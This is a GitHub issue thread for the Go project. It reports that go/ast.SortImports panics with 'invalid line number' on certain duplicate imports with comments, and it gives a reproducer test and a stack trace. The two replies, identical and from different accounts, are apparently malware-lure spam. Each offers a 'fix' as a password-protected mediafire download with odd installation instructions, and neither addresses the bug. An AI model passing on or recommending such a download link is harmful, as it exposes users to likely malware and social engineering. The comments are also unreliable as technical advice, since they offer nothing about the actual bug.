### ISSUE TITLE
go/ast: SortImports crashes with invalid line number panic

### ISSUE THREAD

**Issue by mateusz834** [golang/go#69183]
Reproducer:

```go
func TestFormatCrash(t *testing.T) {
	const src = `package main
import(
"a"//t
"a")
`
	fs := token.NewFileSet()
	f, err := parser.ParseFile(fs, "test.go", src, parser.ParseComments|parser.SkipObjectResolution)
	if err != nil {
		t.Fatal(err)
	}
	ast.SortImports(fs, f)
}
```

```
panic: invalid line number 4 (should be < 4) [recovered]
        panic: invalid line number 4 (should be < 4)

goroutine 6 [running]:
testing.tRunner.func1.2({0x5842c0, 0xc0000263b0})
        testing/testing.go:1706 +0x230
testing.tRunner.func1()
        testing/testing.go:1709 +0x35e
panic({0x5842c0?, 0xc0000263b0?})
        runtime/panic.go:785 +0x132
go/token.(*File).MergeLine(0xc0000322a0, 0x20?)
        go/token/position.go:157 +0x1c8
go/ast.sortSpecs(0xc000110a00, 0xc000100280, {0xc000078080, 0x2, 0x2})
        go/ast/import.go:200 +0xa36
go/ast.SortImports(0xc000110a00, 0xc000100280)
        go/ast/import.go:40 +0x41d
```

SortImports is used by format.Node, so this issue also affects the go/format package.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
